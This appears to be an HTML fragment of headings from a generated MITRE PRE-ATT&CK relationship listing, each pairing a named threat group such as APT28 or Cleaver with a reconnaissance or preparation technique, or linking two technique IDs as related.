<h3 id="_cleaver_g0003_uses_obfuscation_or_cryptography_pre_t1090"><a class="anchor" href="#_cleaver_g0003_uses_obfuscation_or_cryptography_pre_t1090"></a><a class="link" href="#_cleaver_g0003_uses_obfuscation_or_cryptography_pre_t1090">Cleaver (G0003) uses Obfuscation or cryptography (PRE-T1090)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_dynamic_dns_pre_t1088"><a class="anchor" href="#_apt1_g0006_uses_dynamic_dns_pre_t1088"></a><a class="link" href="#_apt1_g0006_uses_dynamic_dns_pre_t1088">APT1 (G0006) uses Dynamic DNS (PRE-T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_uses_conduct_social_engineering_or_humint_operation_pre_t1153"><a class="anchor" href="#_cleaver_g0003_uses_conduct_social_engineering_or_humint_operation_pre_t1153"></a><a class="link" href="#_cleaver_g0003_uses_conduct_social_engineering_or_humint_operation_pre_t1153">Cleaver (G0003) uses Conduct social engineering or HUMINT operation (PRE-T1153)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt17_g0025_uses_obfuscate_infrastructure_pre_t1108"><a class="anchor" href="#_apt17_g0025_uses_obfuscate_infrastructure_pre_t1108"></a><a class="link" href="#_apt17_g0025_uses_obfuscate_infrastructure_pre_t1108">APT17 (G0025) uses Obfuscate infrastructure (PRE-T1108)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_create_custom_payloads_pre_t1122"><a class="anchor" href="#_apt28_g0007_uses_create_custom_payloads_pre_t1122"></a><a class="link" href="#_apt28_g0007_uses_create_custom_payloads_pre_t1122">APT28 (G0007) uses Create custom payloads (PRE-T1122)</a></h3>
</div>
<div class="sect2">
<h3 id="_dynamic_dns_pre_t1088_related_to_dynamic_dns_pre_t1110"><a class="anchor" href="#_dynamic_dns_pre_t1088_related_to_dynamic_dns_pre_t1110"></a><a class="link" href="#_dynamic_dns_pre_t1088_related_to_dynamic_dns_pre_t1110">Dynamic DNS (PRE-T1088) related-to Dynamic DNS (PRE-T1110)</a></h3>
</div>
<div class="sect2">
<h3 id="_dynamic_dns_pre_t1110_related_to_dynamic_dns_pre_t1088"><a class="anchor" href="#_dynamic_dns_pre_t1110_related_to_dynamic_dns_pre_t1088"></a><a class="link" href="#_dynamic_dns_pre_t1110_related_to_dynamic_dns_pre_t1088">Dynamic DNS (PRE-T1110) related-to Dynamic DNS (PRE-T1088)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt17_g0025_uses_build_social_network_persona_pre_t1118"><a class="anchor" href="#_apt17_g0025_uses_build_social_network_persona_pre_t1118"></a><a class="link" href="#_apt17_g0025_uses_build_social_network_persona_pre_t1118">APT17 (G0025) uses Build social network persona (PRE-T1118)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111"><a class="anchor" href="#_apt1_g0006_uses_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111"></a><a class="link" href="#_apt1_g0006_uses_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111">APT1 (G0006) uses Compromise 3rd party infrastructure to support delivery (PRE-T1111)</a></h3>
</div>
<div class="sect2">
<h3 id="_acquire_osint_data_sets_and_information_pre_t1024_related_to_acquire_osint_data_sets_and_information_pre_t1054"><a class="anchor" href="#_acquire_osint_data_sets_and_information_pre_t1024_related_to_acquire_osint_data_sets_and_information_pre_t1054"></a><a class="link" href="#_acquire_osint_data_sets_and_information_pre_t1024_related_to_acquire_osint_data_sets_and_information_pre_t1054">Acquire OSINT data sets and information (PRE-T1024) related-to Acquire OSINT data sets and information (PRE-T1054)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_supply_chains_pre_t1053_related_to_identify_supply_chains_pre_t1023"><a class="anchor" href="#_identify_supply_chains_pre_t1053_related_to_identify_supply_chains_pre_t1023"></a><a class="link" href="#_identify_supply_chains_pre_t1053_related_to_identify_supply_chains_pre_t1023">Identify supply chains (PRE-T1053) related-to Identify supply chains (PRE-T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111_related_to_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1089"><a class="anchor" href="#_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111_related_to_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1089"></a><a class="link" href="#_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111_related_to_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1089">Compromise 3rd party infrastructure to support delivery (PRE-T1111) related-to Compromise 3rd party infrastructure to support delivery (PRE-T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_identify_web_defensive_services_pre_t1033"><a class="anchor" href="#_apt28_g0007_uses_identify_web_defensive_services_pre_t1033"></a><a class="link" href="#_apt28_g0007_uses_identify_web_defensive_services_pre_t1033">APT28 (G0007) uses Identify web defensive services (PRE-T1033)</a></h3>
</div>
<div class="sect2">
<h3 id="_analyze_organizational_skillsets_and_deficiencies_pre_t1077_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1074"><a class="anchor" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1077_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1074"></a><a class="link" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1077_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1074">Analyze organizational skillsets and deficiencies (PRE-T1077) related-to Analyze organizational skillsets and deficiencies (PRE-T1074)</a></h3>
</div>
<div class="sect2">
<h3 id="_acquire_osint_data_sets_and_information_pre_t1043_related_to_acquire_osint_data_sets_and_information_pre_t1054"><a class="anchor" href="#_acquire_osint_data_sets_and_information_pre_t1043_related_to_acquire_osint_data_sets_and_information_pre_t1054"></a><a class="link" href="#_acquire_osint_data_sets_and_information_pre_t1043_related_to_acquire_osint_data_sets_and_information_pre_t1054">Acquire OSINT data sets and information (PRE-T1043) related-to Acquire OSINT data sets and information (PRE-T1054)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_obtain_re_use_payloads_pre_t1123"><a class="anchor" href="#_apt1_g0006_uses_obtain_re_use_payloads_pre_t1123"></a><a class="link" href="#_apt1_g0006_uses_obtain_re_use_payloads_pre_t1123">APT1 (G0006) uses Obtain/re-use payloads (PRE-T1123)</a></h3>
</div>
<div class="sect2">
<h3 id="_acquire_osint_data_sets_and_information_pre_t1024_related_to_acquire_osint_data_sets_and_information_pre_t1043"><a class="anchor" href="#_acquire_osint_data_sets_and_information_pre_t1024_related_to_acquire_osint_data_sets_and_information_pre_t1043"></a><a class="link" href="#_acquire_osint_data_sets_and_information_pre_t1024_related_to_acquire_osint_data_sets_and_information_pre_t1043">Acquire OSINT data sets and information (PRE-T1024) related-to Acquire OSINT data sets and information (PRE-T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_supply_chains_pre_t1023_related_to_identify_supply_chains_pre_t1042"><a class="anchor" href="#_identify_supply_chains_pre_t1023_related_to_identify_supply_chains_pre_t1042"></a><a class="link" href="#_identify_supply_chains_pre_t1023_related_to_identify_supply_chains_pre_t1042">Identify supply chains (PRE-T1023) related-to Identify supply chains (PRE-T1042)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_research_relevant_vulnerabilities_cves_pre_t1068"><a class="anchor" href="#_apt28_g0007_uses_research_relevant_vulnerabilities_cves_pre_t1068"></a><a class="link" href="#_apt28_g0007_uses_research_relevant_vulnerabilities_cves_pre_t1068">APT28 (G0007) uses Research relevant vulnerabilities/CVEs (PRE-T1068)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_acquire_and_or_use_3rd_party_software_services_pre_t1085"><a class="anchor" href="#_apt1_g0006_uses_acquire_and_or_use_3rd_party_software_services_pre_t1085"></a><a class="link" href="#_apt1_g0006_uses_acquire_and_or_use_3rd_party_software_services_pre_t1085">APT1 (G0006) uses Acquire and/or use 3rd party software services (PRE-T1085)</a></h3>
</div>
<div class="sect2">
<h3 id="_acquire_osint_data_sets_and_information_pre_t1054_related_to_acquire_osint_data_sets_and_information_pre_t1043"><a class="anchor" href="#_acquire_osint_data_sets_and_information_pre_t1054_related_to_acquire_osint_data_sets_and_information_pre_t1043"></a><a class="link" href="#_acquire_osint_data_sets_and_information_pre_t1054_related_to_acquire_osint_data_sets_and_information_pre_t1043">Acquire OSINT data sets and information (PRE-T1054) related-to Acquire OSINT data sets and information (PRE-T1043)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144"><a class="anchor" href="#_apt28_g0007_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144"></a><a class="link" href="#_apt28_g0007_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144">APT28 (G0007) uses Spear phishing messages with malicious attachments (PRE-T1144)</a></h3>
</div>
<div class="sect2">
<h3 id="_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1084_related_to_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1106"><a class="anchor" href="#_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1084_related_to_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1106"></a><a class="link" href="#_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1084_related_to_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1106">Acquire and/or use 3rd party infrastructure services (PRE-T1084) related-to Acquire and/or use 3rd party infrastructure services (PRE-T1106)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_supply_chains_pre_t1053_related_to_identify_supply_chains_pre_t1042"><a class="anchor" href="#_identify_supply_chains_pre_t1053_related_to_identify_supply_chains_pre_t1042"></a><a class="link" href="#_identify_supply_chains_pre_t1053_related_to_identify_supply_chains_pre_t1042">Identify supply chains (PRE-T1053) related-to Identify supply chains (PRE-T1042)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1089"><a class="anchor" href="#_apt1_g0006_uses_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1089"></a><a class="link" href="#_apt1_g0006_uses_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1089">APT1 (G0006) uses Compromise 3rd party infrastructure to support delivery (PRE-T1089)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_acquire_osint_data_sets_and_information_pre_t1024"><a class="anchor" href="#_apt28_g0007_uses_acquire_osint_data_sets_and_information_pre_t1024"></a><a class="link" href="#_apt28_g0007_uses_acquire_osint_data_sets_and_information_pre_t1024">APT28 (G0007) uses Acquire OSINT data sets and information (PRE-T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt12_g0005_uses_choose_pre_compromised_persona_and_affiliated_accounts_pre_t1120"><a class="anchor" href="#_apt12_g0005_uses_choose_pre_compromised_persona_and_affiliated_accounts_pre_t1120"></a><a class="link" href="#_apt12_g0005_uses_choose_pre_compromised_persona_and_affiliated_accounts_pre_t1120">APT12 (G0005) uses Choose pre-compromised persona and affiliated accounts (PRE-T1120)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_determine_strategic_target_pre_t1018"><a class="anchor" href="#_apt28_g0007_uses_determine_strategic_target_pre_t1018"></a><a class="link" href="#_apt28_g0007_uses_determine_strategic_target_pre_t1018">APT28 (G0007) uses Determine strategic target (PRE-T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_determine_3rd_party_infrastructure_services_pre_t1061_related_to_determine_3rd_party_infrastructure_services_pre_t1037"><a class="anchor" href="#_determine_3rd_party_infrastructure_services_pre_t1061_related_to_determine_3rd_party_infrastructure_services_pre_t1037"></a><a class="link" href="#_determine_3rd_party_infrastructure_services_pre_t1061_related_to_determine_3rd_party_infrastructure_services_pre_t1037">Determine 3rd party infrastructure services (PRE-T1061) related-to Determine 3rd party infrastructure services (PRE-T1037)</a></h3>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_uses_obtain_re_use_payloads_pre_t1123"><a class="anchor" href="#_cleaver_g0003_uses_obtain_re_use_payloads_pre_t1123"></a><a class="link" href="#_cleaver_g0003_uses_obtain_re_use_payloads_pre_t1123">Cleaver (G0003) uses Obtain/re-use payloads (PRE-T1123)</a></h3>
</div>
<div class="sect2">
<h3 id="_analyze_organizational_skillsets_and_deficiencies_pre_t1074_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1077"><a class="anchor" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1074_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1077"></a><a class="link" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1074_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1077">Analyze organizational skillsets and deficiencies (PRE-T1074) related-to Analyze organizational skillsets and deficiencies (PRE-T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1089_related_to_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111"><a class="anchor" href="#_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1089_related_to_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111"></a><a class="link" href="#_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1089_related_to_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111">Compromise 3rd party infrastructure to support delivery (PRE-T1089) related-to Compromise 3rd party infrastructure to support delivery (PRE-T1111)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_job_postings_and_needs_gaps_pre_t1025_related_to_identify_job_postings_and_needs_gaps_pre_t1044"><a class="anchor" href="#_identify_job_postings_and_needs_gaps_pre_t1025_related_to_identify_job_postings_and_needs_gaps_pre_t1044"></a><a class="link" href="#_identify_job_postings_and_needs_gaps_pre_t1025_related_to_identify_job_postings_and_needs_gaps_pre_t1044">Identify job postings and needs/gaps (PRE-T1025) related-to Identify job postings and needs/gaps (PRE-T1044)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_discover_target_logon_email_address_format_pre_t1032"><a class="anchor" href="#_apt28_g0007_uses_discover_target_logon_email_address_format_pre_t1032"></a><a class="link" href="#_apt28_g0007_uses_discover_target_logon_email_address_format_pre_t1032">APT28 (G0007) uses Discover target logon/email address format (PRE-T1032)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt12_g0005_uses_obfuscate_infrastructure_pre_t1086"><a class="anchor" href="#_apt12_g0005_uses_obfuscate_infrastructure_pre_t1086"></a><a class="link" href="#_apt12_g0005_uses_obfuscate_infrastructure_pre_t1086">APT12 (G0005) uses Obfuscate infrastructure (PRE-T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_obtain_re_use_payloads_pre_t1123"><a class="anchor" href="#_apt28_g0007_uses_obtain_re_use_payloads_pre_t1123"></a><a class="link" href="#_apt28_g0007_uses_obtain_re_use_payloads_pre_t1123">APT28 (G0007) uses Obtain/re-use payloads (PRE-T1123)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt12_g0005_uses_determine_strategic_target_pre_t1018"><a class="anchor" href="#_apt12_g0005_uses_determine_strategic_target_pre_t1018"></a><a class="link" href="#_apt12_g0005_uses_determine_strategic_target_pre_t1018">APT12 (G0005) uses Determine strategic target (PRE-T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt17_g0025_uses_determine_strategic_target_pre_t1018"><a class="anchor" href="#_apt17_g0025_uses_determine_strategic_target_pre_t1018"></a><a class="link" href="#_apt17_g0025_uses_determine_strategic_target_pre_t1018">APT17 (G0025) uses Determine strategic target (PRE-T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_conduct_social_engineering_pre_t1045_related_to_conduct_social_engineering_pre_t1056"><a class="anchor" href="#_conduct_social_engineering_pre_t1045_related_to_conduct_social_engineering_pre_t1056"></a><a class="link" href="#_conduct_social_engineering_pre_t1045_related_to_conduct_social_engineering_pre_t1056">Conduct social engineering (PRE-T1045) related-to Conduct social engineering (PRE-T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt28_g0007_uses_assess_leadership_areas_of_interest_pre_t1001"><a class="anchor" href="#_apt28_g0007_uses_assess_leadership_areas_of_interest_pre_t1001"></a><a class="link" href="#_apt28_g0007_uses_assess_leadership_areas_of_interest_pre_t1001">APT28 (G0007) uses Assess leadership areas of interest (PRE-T1001)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt12_g0005_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144"><a class="anchor" href="#_apt12_g0005_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144"></a><a class="link" href="#_apt12_g0005_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144">APT12 (G0005) uses Spear phishing messages with malicious attachments (PRE-T1144)</a></h3>
</div>
<div class="sect2">
<h3 id="_conduct_social_engineering_pre_t1056_related_to_conduct_social_engineering_pre_t1026"><a class="anchor" href="#_conduct_social_engineering_pre_t1056_related_to_conduct_social_engineering_pre_t1026"></a><a class="link" href="#_conduct_social_engineering_pre_t1056_related_to_conduct_social_engineering_pre_t1026">Conduct social engineering (PRE-T1056) related-to Conduct social engineering (PRE-T1026)</a></h3>
</div>
<div class="sect2">
<h3 id="_acquire_or_compromise_3rd_party_signing_certificates_pre_t1109_related_to_acquire_or_compromise_3rd_party_signing_certificates_pre_t1087"><a class="anchor" href="#_acquire_or_compromise_3rd_party_signing_certificates_pre_t1109_related_to_acquire_or_compromise_3rd_party_signing_certificates_pre_t1087"></a><a class="link" href="#_acquire_or_compromise_3rd_party_signing_certificates_pre_t1109_related_to_acquire_or_compromise_3rd_party_signing_certificates_pre_t1087">Acquire or compromise 3rd party signing certificates (PRE-T1109) related-to Acquire or compromise 3rd party signing certificates (PRE-T1087)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_supply_chains_pre_t1042_related_to_identify_supply_chains_pre_t1023"><a class="anchor" href="#_identify_supply_chains_pre_t1042_related_to_identify_supply_chains_pre_t1023"></a><a class="link" href="#_identify_supply_chains_pre_t1042_related_to_identify_supply_chains_pre_t1023">Identify supply chains (PRE-T1042) related-to Identify supply chains (PRE-T1023)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_job_postings_and_needs_gaps_pre_t1055_related_to_identify_job_postings_and_needs_gaps_pre_t1044"><a class="anchor" href="#_identify_job_postings_and_needs_gaps_pre_t1055_related_to_identify_job_postings_and_needs_gaps_pre_t1044"></a><a class="link" href="#_identify_job_postings_and_needs_gaps_pre_t1055_related_to_identify_job_postings_and_needs_gaps_pre_t1044">Identify job postings and needs/gaps (PRE-T1055) related-to Identify job postings and needs/gaps (PRE-T1044)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt16_g0023_uses_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111"><a class="anchor" href="#_apt16_g0023_uses_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111"></a><a class="link" href="#_apt16_g0023_uses_compromise_3rd_party_infrastructure_to_support_delivery_pre_t1111">APT16 (G0023) uses Compromise 3rd party infrastructure to support delivery (PRE-T1111)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_procure_required_equipment_and_software_pre_t1112"><a class="anchor" href="#_apt1_g0006_uses_procure_required_equipment_and_software_pre_t1112"></a><a class="link" href="#_apt1_g0006_uses_procure_required_equipment_and_software_pre_t1112">APT1 (G0006) uses Procure required equipment and software (PRE-T1112)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_job_postings_and_needs_gaps_pre_t1044_related_to_identify_job_postings_and_needs_gaps_pre_t1055"><a class="anchor" href="#_identify_job_postings_and_needs_gaps_pre_t1044_related_to_identify_job_postings_and_needs_gaps_pre_t1055"></a><a class="link" href="#_identify_job_postings_and_needs_gaps_pre_t1044_related_to_identify_job_postings_and_needs_gaps_pre_t1055">Identify job postings and needs/gaps (PRE-T1044) related-to Identify job postings and needs/gaps (PRE-T1055)</a></h3>
</div>
<div class="sect2">
<h3 id="_analyze_organizational_skillsets_and_deficiencies_pre_t1074_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1066"><a class="anchor" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1074_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1066"></a><a class="link" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1074_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1066">Analyze organizational skillsets and deficiencies (PRE-T1074) related-to Analyze organizational skillsets and deficiencies (PRE-T1066)</a></h3>
</div>
<div class="sect2">
<h3 id="_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1106_related_to_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1084"><a class="anchor" href="#_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1106_related_to_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1084"></a><a class="link" href="#_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1106_related_to_acquire_and_or_use_3rd_party_infrastructure_services_pre_t1084">Acquire and/or use 3rd party infrastructure services (PRE-T1106) related-to Acquire and/or use 3rd party infrastructure services (PRE-T1084)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_targeted_social_media_phishing_pre_t1143"><a class="anchor" href="#_apt1_g0006_uses_targeted_social_media_phishing_pre_t1143"></a><a class="link" href="#_apt1_g0006_uses_targeted_social_media_phishing_pre_t1143">APT1 (G0006) uses Targeted social media phishing (PRE-T1143)</a></h3>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_uses_authorized_user_performs_requested_cyber_action_pre_t1163"><a class="anchor" href="#_cleaver_g0003_uses_authorized_user_performs_requested_cyber_action_pre_t1163"></a><a class="link" href="#_cleaver_g0003_uses_authorized_user_performs_requested_cyber_action_pre_t1163">Cleaver (G0003) uses Authorized user performs requested cyber action (PRE-T1163)</a></h3>
</div>
<div class="sect2">
<h3 id="_analyze_organizational_skillsets_and_deficiencies_pre_t1066_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1077"><a class="anchor" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1066_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1077"></a><a class="link" href="#_analyze_organizational_skillsets_and_deficiencies_pre_t1066_related_to_analyze_organizational_skillsets_and_deficiencies_pre_t1077">Analyze organizational skillsets and deficiencies (PRE-T1066) related-to Analyze organizational skillsets and deficiencies (PRE-T1077)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_derive_intelligence_requirements_pre_t1007"><a class="anchor" href="#_apt1_g0006_uses_derive_intelligence_requirements_pre_t1007"></a><a class="link" href="#_apt1_g0006_uses_derive_intelligence_requirements_pre_t1007">APT1 (G0006) uses Derive intelligence requirements (PRE-T1007)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_authorized_user_performs_requested_cyber_action_pre_t1163"><a class="anchor" href="#_apt1_g0006_uses_authorized_user_performs_requested_cyber_action_pre_t1163"></a><a class="link" href="#_apt1_g0006_uses_authorized_user_performs_requested_cyber_action_pre_t1163">APT1 (G0006) uses Authorized user performs requested cyber action (PRE-T1163)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt16_g0023_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144"><a class="anchor" href="#_apt16_g0023_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144"></a><a class="link" href="#_apt16_g0023_uses_spear_phishing_messages_with_malicious_attachments_pre_t1144">APT16 (G0023) uses Spear phishing messages with malicious attachments (PRE-T1144)</a></h3>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_uses_determine_operational_element_pre_t1019"><a class="anchor" href="#_cleaver_g0003_uses_determine_operational_element_pre_t1019"></a><a class="link" href="#_cleaver_g0003_uses_determine_operational_element_pre_t1019">Cleaver (G0003) uses Determine operational element (PRE-T1019)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt12_g0005_uses_identify_gap_areas_pre_t1002"><a class="anchor" href="#_apt12_g0005_uses_identify_gap_areas_pre_t1002"></a><a class="link" href="#_apt12_g0005_uses_identify_gap_areas_pre_t1002">APT12 (G0005) uses Identify gap areas (PRE-T1002)</a></h3>
</div>
<div class="sect2">
<h3 id="_obfuscate_infrastructure_pre_t1108_related_to_obfuscate_infrastructure_pre_t1086"><a class="anchor" href="#_obfuscate_infrastructure_pre_t1108_related_to_obfuscate_infrastructure_pre_t1086"></a><a class="link" href="#_obfuscate_infrastructure_pre_t1108_related_to_obfuscate_infrastructure_pre_t1086">Obfuscate infrastructure (PRE-T1108) related-to Obfuscate infrastructure (PRE-T1086)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_job_postings_and_needs_gaps_pre_t1044_related_to_identify_job_postings_and_needs_gaps_pre_t1025"><a class="anchor" href="#_identify_job_postings_and_needs_gaps_pre_t1044_related_to_identify_job_postings_and_needs_gaps_pre_t1025"></a><a class="link" href="#_identify_job_postings_and_needs_gaps_pre_t1044_related_to_identify_job_postings_and_needs_gaps_pre_t1025">Identify job postings and needs/gaps (PRE-T1044) related-to Identify job postings and needs/gaps (PRE-T1025)</a></h3>
</div>
<div class="sect2">
<h3 id="_acquire_osint_data_sets_and_information_pre_t1054_related_to_acquire_osint_data_sets_and_information_pre_t1024"><a class="anchor" href="#_acquire_osint_data_sets_and_information_pre_t1054_related_to_acquire_osint_data_sets_and_information_pre_t1024"></a><a class="link" href="#_acquire_osint_data_sets_and_information_pre_t1054_related_to_acquire_osint_data_sets_and_information_pre_t1024">Acquire OSINT data sets and information (PRE-T1054) related-to Acquire OSINT data sets and information (PRE-T1024)</a></h3>
</div>
<div class="sect2">
<h3 id="_cleaver_g0003_uses_determine_strategic_target_pre_t1018"><a class="anchor" href="#_cleaver_g0003_uses_determine_strategic_target_pre_t1018"></a><a class="link" href="#_cleaver_g0003_uses_determine_strategic_target_pre_t1018">Cleaver (G0003) uses Determine strategic target (PRE-T1018)</a></h3>
</div>
<div class="sect2">
<h3 id="_acquire_or_compromise_3rd_party_signing_certificates_pre_t1087_related_to_acquire_or_compromise_3rd_party_signing_certificates_pre_t1109"><a class="anchor" href="#_acquire_or_compromise_3rd_party_signing_certificates_pre_t1087_related_to_acquire_or_compromise_3rd_party_signing_certificates_pre_t1109"></a><a class="link" href="#_acquire_or_compromise_3rd_party_signing_certificates_pre_t1087_related_to_acquire_or_compromise_3rd_party_signing_certificates_pre_t1109">Acquire or compromise 3rd party signing certificates (PRE-T1087) related-to Acquire or compromise 3rd party signing certificates (PRE-T1109)</a></h3>
</div>
<div class="sect2">
<h3 id="_apt1_g0006_uses_build_social_network_persona_pre_t1118"><a class="anchor" href="#_apt1_g0006_uses_build_social_network_persona_pre_t1118"></a><a class="link" href="#_apt1_g0006_uses_build_social_network_persona_pre_t1118">APT1 (G0006) uses Build social network persona (PRE-T1118)</a></h3>
</div>
<div class="sect2">
<h3 id="_conduct_social_engineering_pre_t1026_related_to_conduct_social_engineering_pre_t1045"><a class="anchor" href="#_conduct_social_engineering_pre_t1026_related_to_conduct_social_engineering_pre_t1045"></a><a class="link" href="#_conduct_social_engineering_pre_t1026_related_to_conduct_social_engineering_pre_t1045">Conduct social engineering (PRE-T1026) related-to Conduct social engineering (PRE-T1045)</a></h3>
</div>
<div class="sect2">
<h3 id="_identify_supply_chains_pre_t1023_related_to_identify_supply_chains_pre_t1053"><a class="anchor" href="#_identify_supply_chains_pre_t1023_related_to_identify_supply_chains_pre_t1053"></a><a class="link" href="#_identify_supply_chains_pre_t1023_related_to_identify_supply_chains_pre_t1053">Identify supply chains (PRE-T1023) related-to Identify supply chains (PRE-T1053)</a></h3>
</div>
<div class="sect2">
<h3 id="_determine_3rd_party_infrastructure_services_pre_t1037_related_to_determine_3rd_party_infrastructure_services_pre_t1061"><a class="anchor" href="#_determine_3rd_party_infrastructure_services_pre_t1037_related_to_determine_3rd_party_infrastructure_services_pre_t1061"></a><a class="link" href="#_determine_3rd_party_infrastructure_services_pre_t1037_related_to_determine_3rd_party_infrastructure_services_pre_t1061">Determine 3rd party infrastructure services (PRE-T1037) related-to Determine 3rd party infrastructure services (PRE-T1061)</a></h3>
</div>
<div class="sect2">
<h3 id="_conduct_social_engineering_pre_t1026_related_to_conduct_social_engineering_pre_t1056"><a class="anchor" href="#_conduct_social_engineering_pre_t1026_related_to_conduct_social_engineering_pre_t1056"></a><a class="link" href="#_conduct_social_engineering_pre_t1026_related_to_conduct_social_engineering_pre_t1056">Conduct social engineering (PRE-T1026) related-to Conduct social engineering (PRE-T1056)</a></h3>
</div>
<div class="sect2">
<h3 id="_obfuscate_infrastructure_pre_t1086_related_to_obfuscate_infrastructure_pre_t1108"><a class="anchor" href="#_obfuscate_infrastructure_pre_t1086_related_to_obfuscate_infrastructure_pre_t1108"></a><a class="link" href="#_obfuscate_infrastructure_pre_t1086_related_to_obfuscate_infrastructure_pre_t1108">Obfuscate infrastructure (PRE-T1086) related-to Obfuscate infrastructure (PRE-T1108)</a></h3>
</div>
<div class="sect2">
<h3 id="_acquire_osint_data_sets_and_information_pre_t1043_related_to_acquire_osint_data_sets_and_information_pre_t1024"><a class="anchor" href="#_acquire_osint_data_sets_and_information_pre_t1043_related_to_acquire_osint_data_sets_and_information_pre_t1024"></a><a class="link" href="#_acquire_osint_data_sets_and_information_pre_t1043_related_to_acquire_osint_data_sets_and_information_pre_t1024">Acquire OSINT data sets and information (PRE-T1043) related-to Acquire OSINT data sets and information (PRE-T1024)</a></h3>
</div>
<div class="sect2">
